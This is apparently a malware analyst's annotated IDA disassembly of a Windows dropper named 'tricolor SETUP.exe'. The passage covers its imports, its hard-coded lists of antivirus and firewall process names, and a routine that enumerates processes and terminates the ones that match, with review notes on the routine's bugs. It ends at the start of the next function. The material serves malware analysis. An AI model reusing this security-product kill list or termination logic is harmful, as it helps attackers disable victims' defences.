; ---------------------------------------------------------------------------
; Review notes on the import table (IDA listing, tricolor SETUP.exe).
;
; What the import set alone tells a responder, before reading any code:
;   * Process enumeration + kill: CreateToolhelp32Snapshot / Process32First /
;     Process32Next / OpenProcess / TerminateProcess.
;   * Self-reading and file dropping: GetModuleFileNameA, fopen/fseek/fread/
;     fgetc/fputc, tmpnam, GetTempPathA / GetSystemDirectoryA /
;     GetWindowsDirectoryA / GetCurrentDirectoryA, DeleteFileA, Sleep,
;     and (on the next page of the listing) ShellExecuteA / wsprintfA.
;   * No networking or registry imports are visible in this listing.
; This is the profile of a self-extracting dropper that terminates security
; products before running its payload; the code that follows confirms it.
;
; Header detail worth noting: the image has a single section (Section 1 at
; RVA 0x1000, flags E0040020 = executable+readable+writable) that holds both
; the import table (.idata at 0x401000) and the code (.text at 0x4010A8).
; One RWX section containing imports and code is unusual for compiler-linked
; binaries and is consistent with a custom-built or post-processed image.
; ---------------------------------------------------------------------------
.idata:00401000 ; File Name : tricolor SETUP.exe
.idata:00401000 ; Format : Portable executable for 80386 (PE)
.idata:00401000 ; Imagebase : 400000
.idata:00401000 ; Section 1. (virtual address 00001000)
.idata:00401000 ; Virtual size : 00000DAC ( 3500.)
.idata:00401000 ; Section size in file : 00000E00 ( 3584.)
.idata:00401000 ; Offset to raw data for section: 00000400
.idata:00401000 ; Flags E0040020: Text Executable Readable Writable
.idata:00401000 ; Alignment : default
.idata:00401000 ;
.idata:00401000 ; Imports from KERNEL32.DLL
.idata:00401000 ;
.idata:00401000 ; OS type : MS Windows
.idata:00401000 ; Application type: Executable 32bit
.idata:00401000
.idata:00401000 .686p
.idata:00401000 .mmx
.idata:00401000 .model flat
.idata:00401000
.idata:00401000 ; ===========================================================================
.idata:00401000
.idata:00401000 ; Segment type: Externs
.idata:00401000 ; _idata
; Process-kill primitives (used only by sub_401488 / sub_401540, see XREFs).
.idata:00401000 ; HANDLE __stdcall OpenProcess(DWORD dwDesiredAccess,BOOL bInheritHandle,DWORD dwProcessId)
.idata:00401000 extrn OpenProcess:dword ; DATA XREF: sub_401488+88r
.idata:00401000 ; sub_401540+88r
.idata:00401004 ; BOOL __stdcall CloseHandle(HANDLE hObject)
.idata:00401004 extrn CloseHandle:dword ; DATA XREF: sub_401488+60r
.idata:00401004 ; sub_401488+9Ar ...
.idata:00401008 ; BOOL __stdcall __imp_Process32Next(HANDLE hSnapshot,LPPROCESSENTRY32 lppe)
.idata:00401008 extrn __imp_Process32Next:dword ; DATA XREF: Process32Nextr
.idata:0040100C ; BOOL __stdcall TerminateProcess(HANDLE hProcess,UINT uExitCode)
.idata:0040100C extrn TerminateProcess:dword ; DATA XREF: sub_401488+43r
.idata:0040100C ; sub_401488+51r ...
.idata:00401010 ; BOOL __stdcall __imp_Process32First(HANDLE hSnapshot,LPPROCESSENTRY32 lppe)
.idata:00401010 extrn __imp_Process32First:dword
.idata:00401010 ; DATA XREF: Process32Firstr
.idata:00401014 ; HANDLE __stdcall __imp_CreateToolhelp32Snapshot(DWORD dwFlags,DWORD th32ProcessID)
.idata:00401014 extrn __imp_CreateToolhelp32Snapshot:dword
.idata:00401014 ; DATA XREF: CreateToolhelp32Snapshotr
; File-drop / cleanup primitives (all referenced from WinMain only).
.idata:00401018 ; BOOL __stdcall DeleteFileA(LPCSTR lpFileName)
.idata:00401018 extrn DeleteFileA:dword ; DATA XREF: WinMain(x,x,x,x)+22Br
.idata:00401018 ; WinMain(x,x,x,x)+23Fr ...
.idata:0040101C ; void __stdcall Sleep(DWORD dwMilliseconds)
.idata:0040101C extrn Sleep:dword ; DATA XREF: WinMain(x,x,x,x)+21Br
; The four directory queries are the candidate drop locations; WinMain picks
; one of them from a selector word in the trailer it reads from its own file.
.idata:00401020 ; DWORD __stdcall GetTempPathA(DWORD nBufferLength,LPSTR lpBuffer)
.idata:00401020 extrn GetTempPathA:dword ; DATA XREF: WinMain(x,x,x,x)+94r
.idata:00401024 ; UINT __stdcall GetSystemDirectoryA(LPSTR lpBuffer,UINT uSize)
.idata:00401024 extrn GetSystemDirectoryA:dword
.idata:00401024 ; DATA XREF: WinMain(x,x,x,x)+84r
.idata:00401028 ; UINT __stdcall GetWindowsDirectoryA(LPSTR lpBuffer,UINT uSize)
.idata:00401028 extrn GetWindowsDirectoryA:dword
.idata:00401028 ; DATA XREF: WinMain(x,x,x,x)+74r
.idata:0040102C ; DWORD __stdcall GetCurrentDirectoryA(DWORD nBufferLength,LPSTR lpBuffer)
.idata:0040102C extrn GetCurrentDirectoryA:dword
.idata:0040102C ; DATA XREF: WinMain(x,x,x,x)+64r
; GetModuleFileNameA is how the dropper locates its own image to read the
; appended payloads from (WinMain+1B).
.idata:00401030 ; DWORD __stdcall GetModuleFileNameA(HMODULE hModule,LPSTR lpFilename,DWORD nSize)
.idata:00401030 extrn GetModuleFileNameA:dword
.idata:00401030 ; DATA XREF: WinMain(x,x,x,x)+1Br
.idata:00401034 ; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
.idata:00401034 extrn GetModuleHandleA:dword ; DATA XREF: start+128r
.idata:00401038 ; void __stdcall GetStartupInfoA(LPSTARTUPINFOA lpStartupInfo)
.idata:00401038 extrn GetStartupInfoA:dword ; DATA XREF: start+104r
.idata:0040103C
.idata:00401040 ;
.idata:00401040 ; Imports from MSVCRT.dll
.idata:00401040
; CRT imports. Apart from the startup-support entries (referenced from
; `start`, which is outside this listing), the interesting ones are the stdio
; set and tmpnam: the payloads are copied byte-by-byte with fgetc/fputc and
; the drop file names are generated with tmpnam.
.idata:00401040 extrn __getmainargs:dword ; DATA XREF: start+B5r
.idata:00401044 ; char *__cdecl _imp_strstr(const char *,const char *)
.idata:00401044 extrn __imp_strstr:dword ; DATA XREF: strstrr
.idata:00401048 ; int __cdecl _imp_fclose(FILE *)
.idata:00401048 extrn __imp_fclose:dword ; DATA XREF: fcloser
.idata:0040104C ; int __cdecl _imp_fputc(int,FILE *)
.idata:0040104C extrn __imp_fputc:dword ; DATA XREF: fputcr
.idata:00401050 ; int __cdecl _imp_fgetc(FILE *)
.idata:00401050 extrn __imp_fgetc:dword ; DATA XREF: fgetcr
.idata:00401054 ; size_t __cdecl _imp_fread(void *,size_t,size_t,FILE *)
.idata:00401054 extrn __imp_fread:dword ; DATA XREF: freadr
.idata:00401058 ; int __cdecl _imp_fseek(FILE *,__int32,int)
.idata:00401058 extrn __imp_fseek:dword ; DATA XREF: fseekr
.idata:0040105C ; FILE *__cdecl _imp_fopen(const char *,const char *)
.idata:0040105C extrn __imp_fopen:dword ; DATA XREF: fopenr
.idata:00401060 ; void __cdecl exit(int)
.idata:00401060 extrn _exit:dword ; DATA XREF: .text:00401A08r
.idata:00401064 extrn __imp__XcptFilter:dword ; DATA XREF: _XcptFilterr
.idata:00401068 ; void __cdecl exit(int)
.idata:00401068 extrn exit:dword ; DATA XREF: start+138r
.idata:0040106C extrn _acmdln:dword ; DATA XREF: start+CDr
.idata:00401070 ; char *__cdecl _imp_tmpnam(char *)
.idata:00401070 extrn __imp_tmpnam:dword ; DATA XREF: tmpnamr
.idata:00401074 extrn __imp__initterm:dword ; DATA XREF: _inittermr
.idata:00401078 extrn __setusermatherr:dword ; DATA XREF: start+7Cr
.idata:0040107C extrn _adjust_fdiv:dword ; DATA XREF: start+5Er
.idata:00401080 extrn __p__commode:dword ; DATA XREF: start+50r
.idata:00401084 extrn __p__fmode:dword ; DATA XREF: start+42r
.idata:00401088 extrn __set_app_type:dword ; DATA XREF: start+2Dr
.idata:0040108C extrn _except_handler3:dword ; DATA XREF: .text:loc_401A30r
.idata:00401090 ; unsigned int __cdecl _imp__controlfp(unsigned int,unsigned int)
.idata:00401090 extrn __imp__controlfp:dword ; DATA XREF: _controlfpr
.idata:00401094
.idata:00401098 ;
.idata:00401098 ; Imports from SHELL32.dll
.idata:00401098 ;
; ShellExecuteA is the payload launcher (two call sites in WinMain).
.idata:00401098 ; HINSTANCE __stdcall ShellExecuteA(HWND hwnd,LPCSTR lpOperation,LPCSTR lpFile,LPCSTR lpParameters,LPCSTR lpDirectory,INT nShowCmd)
.idata:00401098 extrn ShellExecuteA:dword ; DATA XREF: WinMain(x,x,x,x)+1DBr
.idata:00401098 ; WinMain(x,x,x,x)+1F5r ...
.idata:00401098 ; Opens or prints a specified file
.idata:0040109C
.idata:004010A0 ;
.idata:004010A0 ; Imports from USER32.dll
.idata:004010A0 ;
; wsprintfA("%s%s%s") builds the two drop-file paths (directory + tmpnam + suffix).
.idata:004010A0 ; int wsprintfA(LPSTR,LPCSTR,...)
.idata:004010A0 extrn wsprintfA:dword ; DATA XREF: WinMain(x,x,x,x)+AAr
.idata:004010A0 ; WinMain(x,x,x,x)+CCr ...
.idata:004010A4
.idata:004010A4
.text:004010A8 ; ===========================================================================
.text:004010A8
.text:004010A8 ; Segment type: Pure code
; Code lives in the same read/write/execute section as the import table
; (see section flags in the file header) - W^X is not respected by this image.
.text:004010A8 ; Segment permissions: Read/Write/Execute
.text:004010A8 _text segment para public 'CODE' use32
.text:004010A8 assume cs:_text
.text:004010A8 ;org 4010A8h
.text:004010A8 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; NOTE(review): referenced from start+5 and shaped like a -1/filter/handler
; triple; presumably the CRT startup's _except_handler3 scope table. Not
; used by any of the functions on this page - confirm from `start`.
.text:004010A8 dword_4010A8 dd 0FFFFFFFFh, 4019EEh, 401A02h, 3 dup(0)
.text:004010A8 ; DATA XREF: start+5o
.text:004010C0
.text:004010C0 ; --------------- S U B R O U T I N E ---------------------------------------
.text:004010C0
.text:004010C0
; ---------------------------------------------------------------------------
; int __cdecl sub_4010C0(char *name)   -- "is this an anti-virus process?"
;
; Returns 1 if any of the hard-coded product names below is a substring of
; `name` (strstr), otherwise 0 (the final strstr result, which is NULL).
; Called from sub_401488 with PROCESSENTRY32.szExeFile of each process.
;
; Review notes:
;   * strstr is case-sensitive and every needle is upper-case, so a
;     mixed- or lower-case image name never matches.  The effectiveness of
;     this kill list therefore depends on how the OS fills szExeFile.
;   * "SMSS.EXE" is not a security product; it is the Windows NT session
;     manager.  Terminating it on an NT-family system takes the system down.
;   * Two needles are checked twice: NAVWNT.EXE (via ebx, 0x401106 and
;     0x401326) and OGRC.EXE (via edi, 0x40119A and 0x401204).  Harmless.
;   * Each `pop ecx / pop ecx` pair is just cdecl cleanup of the two strstr
;     arguments; eax (the strstr result) is what the branch tests.
; Clobbers: eax, ecx (ebx/esi/edi are saved and restored).
; ---------------------------------------------------------------------------
.text:004010C0 ; int __cdecl sub_4010C0(char *)
.text:004010C0 sub_4010C0 proc near ; CODE XREF: sub_401488+3Ep
.text:004010C0 ; sub_401488+71p
.text:004010C0
.text:004010C0 arg_0 = dword ptr 0Ch
.text:004010C0
.text:004010C0 push ebx
.text:004010C1 push esi
.text:004010C2 mov esi, [esp+arg_0] ; esi = haystack (process image name)
.text:004010C6 push edi
.text:004010C7 push offset aAvpm_exe ; "AVPM.EXE"
.text:004010CC push esi ; char *
.text:004010CD call strstr
.text:004010D2 pop ecx
.text:004010D3 test eax, eax
.text:004010D5 pop ecx
.text:004010D6 jnz loc_4013FE ; any hit -> return 1
.text:004010DC push offset aSpider_exe ; "SPIDER.EXE"
.text:004010E1 push esi ; char *
.text:004010E2 call strstr
.text:004010E7 pop ecx
.text:004010E8 test eax, eax
.text:004010EA pop ecx
.text:004010EB jnz loc_4013FE
.text:004010F1 push offset aNavw32_exe ; "NAVW32.EXE"
.text:004010F6 push esi ; char *
.text:004010F7 call strstr
.text:004010FC pop ecx
.text:004010FD test eax, eax
.text:004010FF pop ecx
.text:00401100 jnz loc_4013FE
.text:00401106 mov ebx, offset aNavwnt_exe ; "NAVWNT.EXE" (kept in ebx; re-checked at 0x401326)
.text:0040110B push ebx ; char *
.text:0040110C push esi ; char *
.text:0040110D call strstr
.text:00401112 pop ecx
.text:00401113 test eax, eax
.text:00401115 pop ecx
.text:00401116 jnz loc_4013FE
.text:0040111C push offset aAmon_exe ; "AMON.EXE"
.text:00401121 push esi ; char *
.text:00401122 call strstr
.text:00401127 pop ecx
.text:00401128 test eax, eax
.text:0040112A pop ecx
.text:0040112B jnz loc_4013FE
.text:00401131 push offset a_avpm_exe ; "_AVPM.EXE"
.text:00401136 push esi ; char *
.text:00401137 call strstr
.text:0040113C pop ecx
.text:0040113D test eax, eax
.text:0040113F pop ecx
.text:00401140 jnz loc_4013FE
.text:00401146 push offset aNod32_exe ; "NOD32.EXE"
.text:0040114B push esi ; char *
.text:0040114C call strstr
.text:00401151 pop ecx
.text:00401152 test eax, eax
.text:00401154 pop ecx
.text:00401155 jnz loc_4013FE
.text:0040115B push offset aNsplugin_exe ; "NSPLUGIN.EXE"
.text:00401160 push esi ; char *
.text:00401161 call strstr
.text:00401166 pop ecx
.text:00401167 test eax, eax
.text:00401169 pop ecx
.text:0040116A jnz loc_4013FE
; SMSS.EXE = Windows session manager, not an AV product (see header note).
.text:00401170 push offset aSmss_exe ; "SMSS.EXE"
.text:00401175 push esi ; char *
.text:00401176 call strstr
.text:0040117B pop ecx
.text:0040117C test eax, eax
.text:0040117E pop ecx
.text:0040117F jnz loc_4013FE
.text:00401185 push offset aNavapsvc_exe ; "NAVAPSVC.EXE"
.text:0040118A push esi ; char *
.text:0040118B call strstr
.text:00401190 pop ecx
.text:00401191 test eax, eax
.text:00401193 pop ecx
.text:00401194 jnz loc_4013FE
.text:0040119A mov edi, offset aOgrc_exe ; "OGRC.EXE" (kept in edi; re-checked at 0x401204)
.text:0040119F push edi ; char *
.text:004011A0 push esi ; char *
.text:004011A1 call strstr
.text:004011A6 pop ecx
.text:004011A7 test eax, eax
.text:004011A9 pop ecx
.text:004011AA jnz loc_4013FE
.text:004011B0 push offset aAlogserv_exe ; "ALOGSERV.EXE"
.text:004011B5 push esi ; char *
.text:004011B6 call strstr
.text:004011BB pop ecx
.text:004011BC test eax, eax
.text:004011BE pop ecx
.text:004011BF jnz loc_4013FE
.text:004011C5 push offset aRulaunch_exe ; "RULAUNCH.EXE"
.text:004011CA push esi ; char *
.text:004011CB call strstr
.text:004011D0 pop ecx
.text:004011D1 test eax, eax
.text:004011D3 pop ecx
.text:004011D4 jnz loc_4013FE
.text:004011DA push offset aGuarddog_exe ; "GUARDDOG.EXE"
.text:004011DF push esi ; char *
.text:004011E0 call strstr
.text:004011E5 pop ecx
.text:004011E6 test eax, eax
.text:004011E8 pop ecx
.text:004011E9 jnz loc_4013FE
.text:004011EF push offset aVsmain_exe ; "VSMAIN.EXE"
.text:004011F4 push esi ; char *
.text:004011F5 call strstr
.text:004011FA pop ecx
.text:004011FB test eax, eax
.text:004011FD pop ecx
.text:004011FE jnz loc_4013FE
.text:00401204 push edi ; char * ("OGRC.EXE" again - redundant)
.text:00401205 push esi ; char *
.text:00401206 call strstr
.text:0040120B pop ecx
.text:0040120C test eax, eax
.text:0040120E pop ecx
.text:0040120F jnz loc_4013FE
.text:00401215 push offset aNavapw32_exe ; "NAVAPW32.EXE"
.text:0040121A push esi ; char *
.text:0040121B call strstr
.text:00401220 pop ecx
.text:00401221 test eax, eax
.text:00401223 pop ecx
.text:00401224 jnz loc_4013FE
.text:0040122A push offset aRav7_exe ; "RAV7.EXE"
.text:0040122F push esi ; char *
.text:00401230 call strstr
.text:00401235 pop ecx
.text:00401236 test eax, eax
.text:00401238 pop ecx
.text:00401239 jnz loc_4013FE
.text:0040123F push offset aScan32_exe ; "SCAN32.EXE"
.text:00401244 push esi ; char *
.text:00401245 call strstr
.text:0040124A pop ecx
.text:0040124B test eax, eax
.text:0040124D pop ecx
.text:0040124E jnz loc_4013FE
.text:00401254 push offset aVet95_exe ; "VET95.EXE"
.text:00401259 push esi ; char *
.text:0040125A call strstr
.text:0040125F pop ecx
.text:00401260 test eax, eax
.text:00401262 pop ecx
.text:00401263 jnz loc_4013FE
.text:00401269 push offset aNavnt_exe ; "NAVNT.EXE"
.text:0040126E push esi ; char *
.text:0040126F call strstr
.text:00401274 pop ecx
.text:00401275 test eax, eax
.text:00401277 pop ecx
.text:00401278 jnz loc_4013FE
.text:0040127E push offset aFindviru_exe ; "FINDVIRU.EXE"
.text:00401283 push esi ; char *
.text:00401284 call strstr
.text:00401289 pop ecx
.text:0040128A test eax, eax
.text:0040128C pop ecx
.text:0040128D jnz loc_4013FE
.text:00401293 push offset a_findviru_exe ; "_FINDVIRU.EXE"
.text:00401298 push esi ; char *
.text:00401299 call strstr
.text:0040129E pop ecx
.text:0040129F test eax, eax
.text:004012A1 pop ecx
.text:004012A2 jnz loc_4013FE
.text:004012A8 push offset aClaw95cf_exe ; "CLAW95CF.EXE"
.text:004012AD push esi ; char *
.text:004012AE call strstr
.text:004012B3 pop ecx
.text:004012B4 test eax, eax
.text:004012B6 pop ecx
.text:004012B7 jnz loc_4013FE
.text:004012BD push offset aApvxdwin_exe ; "APVXDWIN.EXE"
.text:004012C2 push esi ; char *
.text:004012C3 call strstr
.text:004012C8 pop ecx
.text:004012C9 test eax, eax
.text:004012CB pop ecx
.text:004012CC jnz loc_4013FE
.text:004012D2 push offset a_avpcc_exe ; "_AVPCC.EXE"
.text:004012D7 push esi ; char *
.text:004012D8 call strstr
.text:004012DD pop ecx
.text:004012DE test eax, eax
.text:004012E0 pop ecx
.text:004012E1 jnz loc_4013FE
.text:004012E7 push offset aAntiTrojan_exe ; "ANTI-TROJAN.EXE"
.text:004012EC push esi ; char *
.text:004012ED call strstr
.text:004012F2 pop ecx
.text:004012F3 test eax, eax
.text:004012F5 pop ecx
.text:004012F6 jnz loc_4013FE
.text:004012FC push offset aAve32_exe ; "AVE32.EXE"
.text:00401301 push esi ; char *
.text:00401302 call strstr
.text:00401307 pop ecx
.text:00401308 test eax, eax
.text:0040130A pop ecx
.text:0040130B jnz loc_4013FE
.text:00401311 push offset aAvwin95_exe ; "AVWIN95.EXE"
.text:00401316 push esi ; char *
.text:00401317 call strstr
.text:0040131C pop ecx
.text:0040131D test eax, eax
.text:0040131F pop ecx
.text:00401320 jnz loc_4013FE
.text:00401326 push ebx ; char * ("NAVWNT.EXE" again - redundant)
.text:00401327 push esi ; char *
.text:00401328 call strstr
.text:0040132D pop ecx
.text:0040132E test eax, eax
.text:00401330 pop ecx
.text:00401331 jnz loc_4013FE
.text:00401337 push offset aIomon98_exe ; "IOMON98.EXE"
.text:0040133C push esi ; char *
.text:0040133D call strstr
.text:00401342 pop ecx
.text:00401343 test eax, eax
.text:00401345 pop ecx
.text:00401346 jnz loc_4013FE
.text:0040134C push offset aFProt95_exe ; "F-PROT95.EXE"
.text:00401351 push esi ; char *
.text:00401352 call strstr
.text:00401357 pop ecx
.text:00401358 test eax, eax
.text:0040135A pop ecx
.text:0040135B jnz loc_4013FE
.text:00401361 push offset aFprot_exe ; "FPROT.EXE"
.text:00401366 push esi ; char *
.text:00401367 call strstr
.text:0040136C pop ecx
.text:0040136D test eax, eax
.text:0040136F pop ecx
.text:00401370 jnz loc_4013FE
.text:00401376 push offset aEsafe_exe ; "ESAFE.EXE"
.text:0040137B push esi ; char *
.text:0040137C call strstr
.text:00401381 pop ecx
.text:00401382 test eax, eax
.text:00401384 pop ecx
.text:00401385 jnz short loc_4013FE
.text:00401387 push offset aAvnt_exe ; "AVNT.EXE"
.text:0040138C push esi ; char *
.text:0040138D call strstr
.text:00401392 pop ecx
.text:00401393 test eax, eax
.text:00401395 pop ecx
.text:00401396 jnz short loc_4013FE
.text:00401398 push offset aAckwin32_exe ; "ACKWIN32.EXE"
.text:0040139D push esi ; char *
.text:0040139E call strstr
.text:004013A3 pop ecx
.text:004013A4 test eax, eax
.text:004013A6 pop ecx
.text:004013A7 jnz short loc_4013FE
.text:004013A9 push offset aVettray_exe ; "VETTRAY.EXE"
.text:004013AE push esi ; char *
.text:004013AF call strstr
.text:004013B4 pop ecx
.text:004013B5 test eax, eax
.text:004013B7 pop ecx
.text:004013B8 jnz short loc_4013FE
.text:004013BA push offset aFpWin_exe ; "FP-WIN.EXE"
.text:004013BF push esi ; char *
.text:004013C0 call strstr
.text:004013C5 pop ecx
.text:004013C6 test eax, eax
.text:004013C8 pop ecx
.text:004013C9 jnz short loc_4013FE
.text:004013CB push offset aEcengine_exe ; "ECENGINE.EXE"
.text:004013D0 push esi ; char *
.text:004013D1 call strstr
.text:004013D6 pop ecx
.text:004013D7 test eax, eax
.text:004013D9 pop ecx
.text:004013DA jnz short loc_4013FE
.text:004013DC push offset aAvkserv_exe ; "AVKSERV.EXE"
.text:004013E1 push esi ; char *
.text:004013E2 call strstr
.text:004013E7 pop ecx
.text:004013E8 test eax, eax
.text:004013EA pop ecx
.text:004013EB jnz short loc_4013FE
.text:004013ED push offset aAvpcc_exe ; "AVPCC.EXE"
.text:004013F2 push esi ; char *
.text:004013F3 call strstr
.text:004013F8 pop ecx
.text:004013F9 test eax, eax
.text:004013FB pop ecx
.text:004013FC jz short loc_401401 ; last needle missed -> eax is already 0
.text:004013FE
.text:004013FE loc_4013FE: ; CODE XREF: sub_4010C0+16j
.text:004013FE ; sub_4010C0+2Bj ...
.text:004013FE push 1 ; match -> return 1
.text:00401400 pop eax
.text:00401401
.text:00401401 loc_401401: ; CODE XREF: sub_4010C0+33Cj
.text:00401401 pop edi
.text:00401402 pop esi
.text:00401403 pop ebx
.text:00401404 retn
.text:00401404 sub_4010C0 endp
.text:00401404
.text:00401405
.text:00401405 ; --------------- S U B R O U T I N E ---------------------------------------
.text:00401405
.text:00401405
; ---------------------------------------------------------------------------
; int __cdecl sub_401405(char *name)   -- "is this a personal-firewall process?"
;
; Same shape and same caveats as sub_4010C0 (case-sensitive substring match,
; upper-case needles only), with a shorter list of firewall product names.
; Returns 1 on a hit; on no hit returns the final strstr result, i.e. 0.
; Called from sub_401540 with PROCESSENTRY32.szExeFile.
; Clobbers: eax, ecx (esi saved/restored).
; ---------------------------------------------------------------------------
.text:00401405 ; int __cdecl sub_401405(char *)
.text:00401405 sub_401405 proc near ; CODE XREF: sub_401540+3Ep
.text:00401405 ; sub_401540+71p
.text:00401405
.text:00401405 arg_0 = dword ptr 8
.text:00401405
.text:00401405 push esi
.text:00401406 mov esi, [esp+arg_0] ; esi = haystack (process image name)
.text:0040140A push offset aZonalarm_exe ; "ZONALARM.EXE"
.text:0040140F push esi ; char *
.text:00401410 call strstr
.text:00401415 pop ecx
.text:00401416 test eax, eax
.text:00401418 pop ecx
.text:00401419 jnz short loc_401483
.text:0040141B push offset aOutpost_exe ; "OUTPOST.EXE"
.text:00401420 push esi ; char *
.text:00401421 call strstr
.text:00401426 pop ecx
.text:00401427 test eax, eax
.text:00401429 pop ecx
.text:0040142A jnz short loc_401483
.text:0040142C push offset aIamapp_exe ; "IAMAPP.EXE"
.text:00401431 push esi ; char *
.text:00401432 call strstr
.text:00401437 pop ecx
.text:00401438 test eax, eax
.text:0040143A pop ecx
.text:0040143B jnz short loc_401483
.text:0040143D push offset aCmgrdian_exe ; "CMGRDIAN.EXE"
.text:00401442 push esi ; char *
.text:00401443 call strstr
.text:00401448 pop ecx
.text:00401449 test eax, eax
.text:0040144B pop ecx
.text:0040144C jnz short loc_401483
.text:0040144E push offset aLookout_exe ; "LOOKOUT.EXE"
.text:00401453 push esi ; char *
.text:00401454 call strstr
.text:00401459 pop ecx
.text:0040145A test eax, eax
.text:0040145C pop ecx
.text:0040145D jnz short loc_401483
.text:0040145F push offset aBlackice_exe ; "BLACKICE.EXE"
.text:00401464 push esi ; char *
.text:00401465 call strstr
.text:0040146A pop ecx
.text:0040146B test eax, eax
.text:0040146D pop ecx
.text:0040146E jnz short loc_401483
.text:00401470 push offset aAtguard_exe ; "ATGUARD.EXE"
.text:00401475 push esi ; char *
.text:00401476 call strstr
.text:0040147B pop ecx
.text:0040147C test eax, eax
.text:0040147E pop ecx
.text:0040147F jnz short loc_401483
.text:00401481 pop esi ; no hit: eax == 0 from the last strstr
.text:00401482 retn
.text:00401483 ; ---------------------------------------------------------------------------
.text:00401483
.text:00401483 loc_401483: ; CODE XREF: sub_401405+14j
.text:00401483 ; sub_401405+25j ...
.text:00401483 push 1 ; match -> return 1
.text:00401485 pop eax
.text:00401486 pop esi
.text:00401487 retn
.text:00401487 sub_401405 endp
.text:00401487
.text:00401488
.text:00401488 ; --------------- S U B R O U T I N E ---------------------------------------
.text:00401488
.text:00401488 ; Attributes: bp-based frame
.text:00401488
; ---------------------------------------------------------------------------
; void sub_401488(void)   -- enumerate all processes, terminate AV matches
;
; Takes a TH32CS_SNAPPROCESS (2) snapshot, walks it with Process32First/Next
; and, for every entry whose szExeFile satisfies sub_4010C0, opens the
; process by PID and calls TerminateProcess.  Called from WinMain only when
; bit 4 of the trailer flag word is set.
;
; Frame layout (PROCESSENTRY32 is 0x128 bytes):
;   [ebp-12Ch] pe               PROCESSENTRY32
;   [ebp-124h] pe.th32ProcessID (offset 8)
;   [ebp-108h] pe.szExeFile     (offset 0x24)
;   [ebp-4]    hSnapshot
;
; Defects a responder should know about (they limit how effective the
; "AV kill" actually is):
;   1. pe.dwSize is never initialised before Process32First.  The API
;      requires it; where that requirement is enforced the first call fails
;      and the loop never runs.
;   2. CreateToolhelp32Snapshot failure is tested against 0, but the
;      documented failure value is INVALID_HANDLE_VALUE (-1), so a failed
;      snapshot is not detected here (Process32First then fails and the
;      function exits without closing anything, which is harmless).
;   3. For the FIRST enumerated entry (0x4014D6-0x4014D9) TerminateProcess is
;      called with ebx = the snapshot handle, not a process handle - the
;      first process in the list is never actually opened or terminated.
;   4. OpenProcess asks for dwDesiredAccess = 0x100000 = SYNCHRONIZE only;
;      PROCESS_TERMINATE (0x1) is not requested.  Where access rights are
;      enforced (NT family) TerminateProcess on that handle is denied.
;      bInheritHandle = 1 is pointless here.
;   5. Return values of TerminateProcess are ignored throughout.
; ---------------------------------------------------------------------------
.text:00401488 sub_401488 proc near ; CODE XREF: WinMain(x,x,x,x)+107p
.text:00401488
.text:00401488 pe = byte ptr -12Ch
.text:00401488 hSnapshot = dword ptr -4
.text:00401488
.text:00401488 push ebp
.text:00401489 mov ebp, esp
.text:0040148B sub esp, 12Ch
.text:00401491 push ebx
.text:00401492 push 0 ; th32ProcessID
.text:00401494 push 2 ; dwFlags (TH32CS_SNAPPROCESS)
.text:00401496 call CreateToolhelp32Snapshot
.text:0040149B mov ebx, eax ; ebx = snapshot handle
.text:0040149D test ebx, ebx ; BUG: failure value is -1, not 0
.text:0040149F mov [ebp+hSnapshot], ebx
.text:004014A2 jz loc_40153D
; BUG: pe.dwSize ([ebp+pe]) is not set before this call.
.text:004014A8 lea eax, [ebp+pe]
.text:004014AE push eax ; lppe
.text:004014AF push ebx ; hSnapshot
.text:004014B0 call Process32First
.text:004014B5 test eax, eax
.text:004014B7 jz loc_40153D
.text:004014BD push esi
.text:004014BE lea eax, [ebp-108h] ; pe.szExeFile
.text:004014C4 push edi
.text:004014C5 push eax ; char *
.text:004014C6 call sub_4010C0
.text:004014CB mov esi, ds:TerminateProcess
.text:004014D1 pop ecx
.text:004014D2 test eax, eax
.text:004014D4 jz short loc_4014DB
; BUG: ebx is still the SNAPSHOT handle here - no OpenProcess was done for
; the first entry, so this TerminateProcess can only fail.
.text:004014D6 push 0 ; uExitCode
.text:004014D8 push ebx ; hProcess
.text:004014D9 call esi ; TerminateProcess
.text:004014DB
.text:004014DB loc_4014DB: ; CODE XREF: sub_401488+4Cj
.text:004014DB lea eax, [ebp+pe]
.text:004014E1 push eax ; lppe
.text:004014E2 push ebx ; hSnapshot
.text:004014E3 call Process32Next
.text:004014E8 mov edi, ds:CloseHandle
.text:004014EE test eax, eax
.text:004014F0 jz short loc_401538
.text:004014F2
.text:004014F2 loc_4014F2: ; CODE XREF: sub_401488+AEj
; Loop over the remaining entries: match name -> OpenProcess(PID) -> kill.
.text:004014F2 lea eax, [ebp-108h] ; pe.szExeFile
.text:004014F8 push eax ; char *
.text:004014F9 call sub_4010C0
.text:004014FE test eax, eax
.text:00401500 pop ecx
.text:00401501 jz short loc_401524
.text:00401503 push dword ptr [ebp-124h] ; dwProcessId (pe.th32ProcessID)
.text:00401509 push 1 ; bInheritHandle
.text:0040150B push 100000h ; dwDesiredAccess = SYNCHRONIZE only (no PROCESS_TERMINATE)
.text:00401510 call ds:OpenProcess
.text:00401516 mov ebx, eax ; ebx temporarily = process handle (0 on failure)
.text:00401518 test ebx, ebx
.text:0040151A jz short loc_401524
.text:0040151C push 0 ; uExitCode
.text:0040151E push ebx ; hProcess
.text:0040151F call esi ; TerminateProcess (result ignored)
.text:00401521 push ebx ; hObject
.text:00401522 call edi ; CloseHandle
.text:00401524
.text:00401524 loc_401524: ; CODE XREF: sub_401488+79j
.text:00401524 ; sub_401488+92j
.text:00401524 mov ebx, [ebp+hSnapshot] ; restore snapshot handle for Process32Next
.text:00401527 lea eax, [ebp+pe]
.text:0040152D push eax ; lppe
.text:0040152E push ebx ; hSnapshot
.text:0040152F call Process32Next
.text:00401534 test eax, eax
.text:00401536 jnz short loc_4014F2
.text:00401538
.text:00401538 loc_401538: ; CODE XREF: sub_401488+68j
.text:00401538 push ebx ; hObject (snapshot)
.text:00401539 call edi ; CloseHandle
.text:0040153B pop edi
.text:0040153C pop esi
.text:0040153D
.text:0040153D loc_40153D: ; CODE XREF: sub_401488+1Aj
.text:0040153D ; sub_401488+2Fj
; Early exits arrive here before esi/edi were pushed, so only ebx is popped.
.text:0040153D pop ebx
.text:0040153E leave
.text:0040153F retn
.text:0040153F sub_401488 endp
.text:0040153F
.text:00401540
.text:00401540 ; --------------- S U B R O U T I N E ---------------------------------------
.text:00401540
.text:00401540 ; Attributes: bp-based frame
.text:00401540
; ---------------------------------------------------------------------------
; void sub_401540(void)   -- enumerate all processes, terminate firewall matches
;
